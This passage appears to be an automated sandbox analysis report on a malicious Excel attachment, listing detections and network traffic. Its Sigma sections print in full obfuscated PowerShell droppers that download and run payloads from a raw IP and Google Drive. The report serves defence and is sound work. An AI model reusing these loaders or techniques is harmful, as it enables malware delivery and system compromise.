      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3404, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", CommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICA
      Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87,
      Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3772, TargetFilename: C:\Users\user\AppData\Local\Temp\jsnmpiob.0rn.ps1

      Data Obfuscation

      barindex
      Sigma detected: Dot net compiler compiles file from suspicious location
      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline", ProcessId: 3980, ProcessName: csc.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-24T08:39:29.928661+020020241971A Network Trojan was detected192.210.215.880192.168.2.2249162TCP
      2024-10-24T08:39:33.317474+020020241971A Network Trojan was detected192.210.215.880192.168.2.2249164TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-24T08:39:29.928648+020020244491Attempted User Privilege Gain192.168.2.2249162192.210.215.880TCP
      2024-10-24T08:39:33.317459+020020244491Attempted User Privilege Gain192.168.2.2249164192.210.215.880TCP
      2024-10-24T08:39:54.716795+020020244491Attempted User Privilege Gain192.168.2.2249170192.210.215.880TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-24T08:40:06.632900+020020490381A Network Trojan was detected142.250.186.97443192.168.2.2249172TCP
      2024-10-24T08:40:14.905847+020020490381A Network Trojan was detected142.250.186.97443192.168.2.2249174TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: A & C Metrology OC 5457144.xlsReversingLabs: Detection: 18%
      Machine Learning detection for sample
      Source: A & C Metrology OC 5457144.xlsJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49171 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49172 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 216.58.212.174:443 -> 192.168.2.22:49173 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49169 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49168 version: TLS 1.2
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdb source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdbhP source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdbhP source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdb source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Document exploit detected (process start blacklist hit)
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficDNS query: name: u4u.kids
      Source: global trafficDNS query: name: u4u.kids
      Source: global trafficDNS query: name: u4u.kids
      Source: global trafficDNS query: name: drive.google.com
      Source: global trafficDNS query: name: drive.usercontent.google.com
      Source: global trafficDNS query: name: drive.google.com
      Source: global trafficDNS query: name: drive.usercontent.google.com
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49162 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 192.210.215.8:80
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 216.58.212.174:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 24.199.88.84:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
      Source: global trafficTCP traffic: 192.168.2.22:49172 -> 142.250.186.97:443
